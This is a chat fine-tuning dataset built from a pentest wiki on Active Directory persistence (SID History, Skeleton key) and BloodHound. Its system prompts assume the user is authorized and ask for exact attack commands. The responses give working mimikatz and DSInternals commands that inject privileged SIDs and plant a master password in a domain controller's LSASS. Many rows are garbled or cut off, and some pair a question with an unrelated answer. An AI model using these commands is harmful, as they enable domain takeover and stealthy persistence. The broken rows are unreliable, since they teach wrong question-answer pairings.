are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Example 1 : Use this command to inject the SID of built-in administrator account to the SID-History attribute of AttackerUser"}, {"role": "assistant", "content": "mikikatz.exe \"privilege::debug\" \"sid::patch\" \"sid::add /sam:AttackerUser /new:Builtin\\administrators \""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Example 1 : Use this command to inject the SID of built-in administrator account to the SID-History attribute of AttackerUser", "response": "mikikatz.exe \"privilege::debug\" \"sid::patch\" \"sid::add /sam:AttackerUser /new:Builtin\\administrators \"", "metadata": {"corpus_index": 1234, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Example 2 : Use sid::lookup to retrieve the SID of an account and inject it to the SID-History attribute of AttackerUser?"}, {"role": "assistant", "content": "mikikatz.exe \"sid::lookup /name:InterestingUser\"\nmikikatz.exe \"privilege::debug\" \"sid::patch\" \"sid::add /sam:AttackerUser /new:SIDOfInterestingUser\"\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Example 2 : Use sid::lookup to retrieve the SID of an account and inject it to the SID-History attribute of AttackerUser?", "response": "mikikatz.exe \"sid::lookup /name:InterestingUser\"\nmikikatz.exe \"privilege::debug\" \"sid::patch\" \"sid::add /sam:AttackerUser /new:SIDOfInterestingUser\"\n```", "metadata": {"corpus_index": 1235, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Example 2 : Use sid::lookup to retrieve the SID of an account and inject it to the SID-History attribute of AttackerUser"}, {"role": "assistant", "content": "mikikatz.exe \"sid::lookup /name:InterestingUser\"\nmikikatz.exe \"privilege::debug\" \"sid::patch\" \"sid::add /sam:AttackerUser /new:SIDOfInterestingUser\"\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Example 2 : Use sid::lookup to retrieve the SID of an account and inject it to the SID-History attribute of AttackerUser", "response": "mikikatz.exe \"sid::lookup /name:InterestingUser\"\nmikikatz.exe \"privilege::debug\" \"sid::patch\" \"sid::add /sam:AttackerUser /new:SIDOfInterestingUser\"\n```", "metadata": {"corpus_index": 1235, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain SID History - Post-Windows 2016"}, {"role": "assistant", "content": "The only known way to add a SID to the SID History attribute of an account on a Windows domain controller 2016 and above is to use the Powershell module DSInternals. This method also works for Pre-Windows 2016 domain controllers.\n\n> [!CAUTION]\n> The NTDS service must be stopped at some point and restarted for this procedure to work, which can cause various issues. Proceed with care, avoid production systems.\n\nIt is necessary to re-enable the Add-ADDBSidHistory function, which has been disabled in version 4.15 of DSInternals:\n\n```powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain SID History - Post-Windows 2016", "response": "The only known way to add a SID to the SID History attribute of an account on a Windows domain controller 2016 and above is to use the Powershell module DSInternals. This method also works for Pre-Windows 2016 domain controllers.\n\n> [!CAUTION]\n> The NTDS service must be stopped at some point and restarted for this procedure to work, which can cause various issues. Proceed with care, avoid production systems.\n\nIt is necessary to re-enable the Add-ADDBSidHistory function, which has been disabled in version 4.15 of DSInternals:\n\n```powershell", "metadata": {"corpus_index": 1236, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do SID History - Post-Windows 2016"}, {"role": "assistant", "content": "The only known way to add a SID to the SID History attribute of an account on a Windows domain controller 2016 and above is to use the Powershell module DSInternals. This method also works for Pre-Windows 2016 domain controllers.\n\n> [!CAUTION]\n> The NTDS service must be stopped at some point and restarted for this procedure to work, which can cause various issues. Proceed with care, avoid production systems.\n\nIt is necessary to re-enable the Add-ADDBSidHistory function, which has been disabled in version 4.15 of DSInternals:\n\n```powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do SID History - Post-Windows 2016", "response": "The only known way to add a SID to the SID History attribute of an account on a Windows domain controller 2016 and above is to use the Powershell module DSInternals. This method also works for Pre-Windows 2016 domain controllers.\n\n> [!CAUTION]\n> The NTDS service must be stopped at some point and restarted for this procedure to work, which can cause various issues. Proceed with care, avoid production systems.\n\nIt is necessary to re-enable the Add-ADDBSidHistory function, which has been disabled in version 4.15 of DSInternals:\n\n```powershell", "metadata": {"corpus_index": 1236, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Modify the file DSInternals.psd1"}, {"role": "assistant", "content": "notepad.exe (Join-Path (Get-InstalledModule -Name DSInternals | Select-Object -ExpandProperty InstalledLocation) 'DSInternals.psd1')"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Modify the file DSInternals.psd1", "response": "notepad.exe (Join-Path (Get-InstalledModule -Name DSInternals | Select-Object -ExpandProperty InstalledLocation) 'DSInternals.psd1')", "metadata": {"corpus_index": 1237, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Modify the file DSInternals.psd1?"}, {"role": "assistant", "content": "notepad.exe (Join-Path (Get-InstalledModule -Name DSInternals | Select-Object -ExpandProperty InstalledLocation) 'DSInternals.psd1')"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Modify the file DSInternals.psd1?", "response": "notepad.exe (Join-Path (Get-InstalledModule -Name DSInternals | Select-Object -ExpandProperty InstalledLocation) 'DSInternals.psd1')", "metadata": {"corpus_index": 1237, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Then replace the line \"# Intentionally excluded: 'Add-ADDBSidHistory'\" with \"'Add-ADDBSidHistory'\""}, {"role": "assistant", "content": "``\n\nThen, open a new PowerShell console:\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Then replace the line \"# Intentionally excluded: 'Add-ADDBSidHistory'\" with \"'Add-ADDBSidHistory'\"", "response": "``\n\nThen, open a new PowerShell console:\n\n``powershell", "metadata": {"corpus_index": 1238, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Then replace the line \"# Intentionally excluded: 'Add-ADDBSidHistory'\" with \"'Add-ADDBSidHistory'\""}, {"role": "assistant", "content": "``\n\nThen, open a new PowerShell console:\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Then replace the line \"# Intentionally excluded: 'Add-ADDBSidHistory'\" with \"'Add-ADDBSidHistory'\"", "response": "``\n\nThen, open a new PowerShell console:\n\n``powershell", "metadata": {"corpus_index": 1238, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Then replace the line \"# Intentionally excluded: 'Add-ADDBSidHistory'\" with \"'Add-ADDBSidHistory'\""}, {"role": "assistant", "content": "Then, open a new PowerShell console:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Then replace the line \"# Intentionally excluded: 'Add-ADDBSidHistory'\" with \"'Add-ADDBSidHistory'\"", "response": "Then, open a new PowerShell console:", "metadata": {"corpus_index": 1239, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Then, open a new PowerShell console:`?"}, {"role": "assistant", "content": "This command is used for then replace the line \"# intentionally excluded: 'add-addbsidhistory'\" with \"'add-addbsidhistory'\". Then replace the line \"# Intentionally excluded: 'Add-ADDBSidHistory'\" with \"'Add-ADDBSidHistory'\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Then, open a new PowerShell console:`?", "response": "This command is used for then replace the line \"# intentionally excluded: 'add-addbsidhistory'\" with \"'add-addbsidhistory'\". Then replace the line \"# Intentionally excluded: 'Add-ADDBSidHistory'\" with \"'Add-ADDBSidHistory'\"", "metadata": {"corpus_index": 1239, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Inject the SID into the SID History attribute?"}, {"role": "assistant", "content": "Add-ADDBSidHistory -samaccountname AttackerUser -sidhistory $SIDOfInterestingUser -DBPath C:\\Windows\\ntds\\ntds.dit -Force"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Inject the SID into the SID History attribute?", "response": "Add-ADDBSidHistory -samaccountname AttackerUser -sidhistory $SIDOfInterestingUser -DBPath C:\\Windows\\ntds\\ntds.dit -Force", "metadata": {"corpus_index": 1240, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Inject the SID into the SID History attribute?"}, {"role": "assistant", "content": "Add-ADDBSidHistory -samaccountname AttackerUser -sidhistory $SIDOfInterestingUser -DBPath C:\\Windows\\ntds\\ntds.dit -Force"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Inject the SID into the SID History attribute?", "response": "Add-ADDBSidHistory -samaccountname AttackerUser -sidhistory $SIDOfInterestingUser -DBPath C:\\Windows\\ntds\\ntds.dit -Force", "metadata": {"corpus_index": 1240, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Skeleton key - Theory in the context of penetration testing"}, {"role": "assistant", "content": "Skeleton key is a persistence attack used to set a master password on one or multiple Domain Controllers. The master password can then be used to authenticate as any user in the domain while they can still authenticate with their original password. It makes detecting this attack a difficult task since it doesn't disturb day-to-day usage in the domain.\n\nSkeleton key injects itself into the LSASS process of a Domain Controller to create the master password. It requires Domain Admin rights and SeDebugPrivilege on the target (which are given by default to domain admins). \n\n> [!WARNING]\n> Since this attack is conducted in memory by reserving a region of memory with VirtualAllocEx() and by patching functions, the master password doesn't remain active after a DC reboot.\n\nThis attack currently supports NTLM and Kerberos (RC4 only) authentications. Below are a few explanation of how it works depending on the authentication protocol it injects a master key for. \n\n::: tabs\n\n=== NTLM auth\n\nThe attack employs a three-steps process to create a master password for NTLM authentication.\n\n1. Reserves a memory region using VirtualAllocEx() for the lsass.exe process. This memory space is used to store a modified version of the NTLM password validation function MsvpPasswordValidate().\n2. Attaches itself to the lsass.exe process and locates MsvpSamValidate() (authentication function) from MSV1_0.dll (which is the DLL in charge of NTLM authentication).\n3. Finds the call to MsvpPasswordValidate() (password validation function) in MsvpSamValidate() and patches it to make it point to the modified MsvpPasswordValidate() stored in the memory region from step 1.\n\nWhen called, the modified version of MsvpPasswordValidate() first calls the original MsvpPasswordValidate(): therefore if a legitimate authentication is tried, it will succeed.\n\nIf the original MsvpPasswordValidate() fails, the modified version will call the originalMsvpPasswordValidate() again but will make it compare password hash su"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Skeleton key - Theory in the context of penetration testing", "response": "Skeleton key is a persistence attack used to set a master password on one or multiple Domain Controllers. The master password can then be used to authenticate as any user in the domain while they can still authenticate with their original password. It makes detecting this attack a difficult task since it doesn't disturb day-to-day usage in the domain.\n\nSkeleton key injects itself into the LSASS process of a Domain Controller to create the master password. It requires Domain Admin rights and SeDebugPrivilege on the target (which are given by default to domain admins). \n\n> [!WARNING]\n> Since this attack is conducted in memory by reserving a region of memory with VirtualAllocEx() and by patching functions, the master password doesn't remain active after a DC reboot.\n\nThis attack currently supports NTLM and Kerberos (RC4 only) authentications. Below are a few explanation of how it works depending on the authentication protocol it injects a master key for. \n\n::: tabs\n\n=== NTLM auth\n\nThe attack employs a three-steps process to create a master password for NTLM authentication.\n\n1. Reserves a memory region using VirtualAllocEx() for the lsass.exe process. This memory space is used to store a modified version of the NTLM password validation function MsvpPasswordValidate().\n2. Attaches itself to the lsass.exe process and locates MsvpSamValidate() (authentication function) from MSV1_0.dll (which is the DLL in charge of NTLM authentication).\n3. Finds the call to MsvpPasswordValidate() (password validation function) in MsvpSamValidate() and patches it to make it point to the modified MsvpPasswordValidate() stored in the memory region from step 1.\n\nWhen called, the modified version of MsvpPasswordValidate() first calls the original MsvpPasswordValidate(): therefore if a legitimate authentication is tried, it will succeed.\n\nIf the original MsvpPasswordValidate() fails, the modified version will call the originalMsvpPasswordValidate() again but will make it compare password hash su", "metadata": {"corpus_index": 1241, "category": "active_directory", "source_file": "docs/src/ad/persistence/skeleton-key/index.md", "page_title": "Skeleton key", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Skeleton key - Theory"}, {"role": "assistant", "content": "Skeleton key is a persistence attack used to set a master password on one or multiple Domain Controllers. The master password can then be used to authenticate as any user in the domain while they can still authenticate with their original password. It makes detecting this attack a difficult task since it doesn't disturb day-to-day usage in the domain.\n\nSkeleton key injects itself into the LSASS process of a Domain Controller to create the master password. It requires Domain Admin rights and SeDebugPrivilege on the target (which are given by default to domain admins). \n\n> [!WARNING]\n> Since this attack is conducted in memory by reserving a region of memory with VirtualAllocEx() and by patching functions, the master password doesn't remain active after a DC reboot.\n\nThis attack currently supports NTLM and Kerberos (RC4 only) authentications. Below are a few explanation of how it works depending on the authentication protocol it injects a master key for. \n\n::: tabs\n\n=== NTLM auth\n\nThe attack employs a three-steps process to create a master password for NTLM authentication.\n\n1. Reserves a memory region using VirtualAllocEx() for the lsass.exe process. This memory space is used to store a modified version of the NTLM password validation function MsvpPasswordValidate().\n2. Attaches itself to the lsass.exe process and locates MsvpSamValidate() (authentication function) from MSV1_0.dll (which is the DLL in charge of NTLM authentication).\n3. Finds the call to MsvpPasswordValidate() (password validation function) in MsvpSamValidate() and patches it to make it point to the modified MsvpPasswordValidate() stored in the memory region from step 1.\n\nWhen called, the modified version of MsvpPasswordValidate() first calls the original MsvpPasswordValidate(): therefore if a legitimate authentication is tried, it will succeed.\n\nIf the original MsvpPasswordValidate() fails, the modified version will call the originalMsvpPasswordValidate() again but will make it compare password hash su"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Skeleton key - Theory", "response": "Skeleton key is a persistence attack used to set a master password on one or multiple Domain Controllers. The master password can then be used to authenticate as any user in the domain while they can still authenticate with their original password. It makes detecting this attack a difficult task since it doesn't disturb day-to-day usage in the domain.\n\nSkeleton key injects itself into the LSASS process of a Domain Controller to create the master password. It requires Domain Admin rights and SeDebugPrivilege on the target (which are given by default to domain admins). \n\n> [!WARNING]\n> Since this attack is conducted in memory by reserving a region of memory with VirtualAllocEx() and by patching functions, the master password doesn't remain active after a DC reboot.\n\nThis attack currently supports NTLM and Kerberos (RC4 only) authentications. Below are a few explanation of how it works depending on the authentication protocol it injects a master key for. \n\n::: tabs\n\n=== NTLM auth\n\nThe attack employs a three-steps process to create a master password for NTLM authentication.\n\n1. Reserves a memory region using VirtualAllocEx() for the lsass.exe process. This memory space is used to store a modified version of the NTLM password validation function MsvpPasswordValidate().\n2. Attaches itself to the lsass.exe process and locates MsvpSamValidate() (authentication function) from MSV1_0.dll (which is the DLL in charge of NTLM authentication).\n3. Finds the call to MsvpPasswordValidate() (password validation function) in MsvpSamValidate() and patches it to make it point to the modified MsvpPasswordValidate() stored in the memory region from step 1.\n\nWhen called, the modified version of MsvpPasswordValidate() first calls the original MsvpPasswordValidate(): therefore if a legitimate authentication is tried, it will succeed.\n\nIf the original MsvpPasswordValidate() fails, the modified version will call the originalMsvpPasswordValidate() again but will make it compare password hash su", "metadata": {"corpus_index": 1241, "category": "active_directory", "source_file": "docs/src/ad/persistence/skeleton-key/index.md", "page_title": "Skeleton key", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Skeleton key - Practice?"}, {"role": "assistant", "content": "Skeleton Key can be injected with the misc::skeleton command in Mimikatz. It works in every 64-bits Windows Server version up to 2019 (included).\n\nMimikatz must be either launched as NT-AUTHORITY\\SYSTEM or be executed with a domain admin account on the Domain Controller. For the latter, debug privileges (SeDebugPrivilege) must be set for Mimikatz to work. This can be done with the privilege::debug command.\n\n``bash\nmimikatz \"privilege::debug\" \"misc::skeleton\"\n`\n\n> [!TIP]\n> By default, the master password injected is mimikatz`.\n\n![](./assets/mimikatz_skeleton_key_ws2019.png)\n\nSkeleton key injection and usage illustration on a Windows Server 2019{.caption}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Skeleton key - Practice?", "response": "Skeleton Key can be injected with the misc::skeleton command in Mimikatz. It works in every 64-bits Windows Server version up to 2019 (included).\n\nMimikatz must be either launched as NT-AUTHORITY\\SYSTEM or be executed with a domain admin account on the Domain Controller. For the latter, debug privileges (SeDebugPrivilege) must be set for Mimikatz to work. This can be done with the privilege::debug command.\n\n``bash\nmimikatz \"privilege::debug\" \"misc::skeleton\"\n`\n\n> [!TIP]\n> By default, the master password injected is mimikatz`.\n\n![](./assets/mimikatz_skeleton_key_ws2019.png)\n\nSkeleton key injection and usage illustration on a Windows Server 2019{.caption}", "metadata": {"corpus_index": 1242, "category": "active_directory", "source_file": "docs/src/ad/persistence/skeleton-key/index.md", "page_title": "Skeleton key", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Skeleton key - Practice during a pentest?"}, {"role": "assistant", "content": "Skeleton Key can be injected with the misc::skeleton command in Mimikatz. It works in every 64-bits Windows Server version up to 2019 (included).\n\nMimikatz must be either launched as NT-AUTHORITY\\SYSTEM or be executed with a domain admin account on the Domain Controller. For the latter, debug privileges (SeDebugPrivilege) must be set for Mimikatz to work. This can be done with the privilege::debug command.\n\n``bash\nmimikatz \"privilege::debug\" \"misc::skeleton\"\n`\n\n> [!TIP]\n> By default, the master password injected is mimikatz`.\n\n![](./assets/mimikatz_skeleton_key_ws2019.png)\n\nSkeleton key injection and usage illustration on a Windows Server 2019{.caption}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Skeleton key - Practice during a pentest?", "response": "Skeleton Key can be injected with the misc::skeleton command in Mimikatz. It works in every 64-bits Windows Server version up to 2019 (included).\n\nMimikatz must be either launched as NT-AUTHORITY\\SYSTEM or be executed with a domain admin account on the Domain Controller. For the latter, debug privileges (SeDebugPrivilege) must be set for Mimikatz to work. This can be done with the privilege::debug command.\n\n``bash\nmimikatz \"privilege::debug\" \"misc::skeleton\"\n`\n\n> [!TIP]\n> By default, the master password injected is mimikatz`.\n\n![](./assets/mimikatz_skeleton_key_ws2019.png)\n\nSkeleton key injection and usage illustration on a Windows Server 2019{.caption}", "metadata": {"corpus_index": 1242, "category": "active_directory", "source_file": "docs/src/ad/persistence/skeleton-key/index.md", "page_title": "Skeleton key", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use mimikatz for skeleton key - practice?"}, {"role": "assistant", "content": "mimikatz \"privilege::debug\" \"misc::skeleton\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use mimikatz for skeleton key - practice?", "response": "mimikatz \"privilege::debug\" \"misc::skeleton\"", "metadata": {"corpus_index": 1243, "category": "active_directory", "source_file": "docs/src/ad/persistence/skeleton-key/index.md", "page_title": "Skeleton key", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "mimikatz"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Skeleton key - Practice"}, {"role": "assistant", "content": "mimikatz \"privilege::debug\" \"misc::skeleton\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Skeleton key - Practice", "response": "mimikatz \"privilege::debug\" \"misc::skeleton\"", "metadata": {"corpus_index": 1243, "category": "active_directory", "source_file": "docs/src/ad/persistence/skeleton-key/index.md", "page_title": "Skeleton key", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `mimikatz \"privilege::debug\" \"misc::skeleton\"`?"}, {"role": "assistant", "content": "This command is used for skeleton key - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `mimikatz \"privilege::debug\" \"misc::skeleton\"`?", "response": "This command is used for skeleton key - practice. Practice", "metadata": {"corpus_index": 1243, "category": "active_directory", "source_file": "docs/src/ad/persistence/skeleton-key/index.md", "page_title": "Skeleton key", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe BloodHound ⚙️ - Theory in the context of penetration testing"}, {"role": "assistant", "content": "BloodHound (Javascript webapp, compiled with Electron, uses Neo4j as graph DBMS) is an awesome tool that allows mapping of relationships within Active Directory environments. It mostly uses Windows API functions and LDAP namespace functions to collect data from domain controllers and domain-joined Windows systems."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe BloodHound ⚙️ - Theory in the context of penetration testing", "response": "BloodHound (Javascript webapp, compiled with Electron, uses Neo4j as graph DBMS) is an awesome tool that allows mapping of relationships within Active Directory environments. It mostly uses Windows API functions and LDAP namespace functions to collect data from domain controllers and domain-joined Windows systems.", "metadata": {"corpus_index": 1244, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on BloodHound ⚙️ - Theory"}, {"role": "assistant", "content": "BloodHound (Javascript webapp, compiled with Electron, uses Neo4j as graph DBMS) is an awesome tool that allows mapping of relationships within Active Directory environments. It mostly uses Windows API functions and LDAP namespace functions to collect data from domain controllers and domain-joined Windows systems."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on BloodHound ⚙️ - Theory", "response": "BloodHound (Javascript webapp, compiled with Electron, uses Neo4j as graph DBMS) is an awesome tool that allows mapping of relationships within Active Directory environments. It mostly uses Windows API functions and LDAP namespace functions to collect data from domain controllers and domain-joined Windows systems.", "metadata": {"corpus_index": 1244, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of BloodHound ⚙️ - Collection"}, {"role": "assistant", "content": "BloodHound needs to be fed JSON files containing info on the objects and relationships within the AD domain. This information are obtained with collectors (also called ingestors). The best way of doing this is using the official SharpHound (C#) collector.\n\n::: tabs\n\n=== Windows\n\nSharpHound (sources, builds) is designed targeting .Net 4.5. It can be used as a compiled executable.\n\nIt must be run from the context of a domain user, either directly through a logon or through another method such as runas (runas /netonly /user:$DOMAIN\\$USER) (see Impersonation). Alternatively, SharpHound can be used with the LdapUsername and LdapPassword flags for that matter.\n\n``bash\nSharpHound.exe --collectionmethods 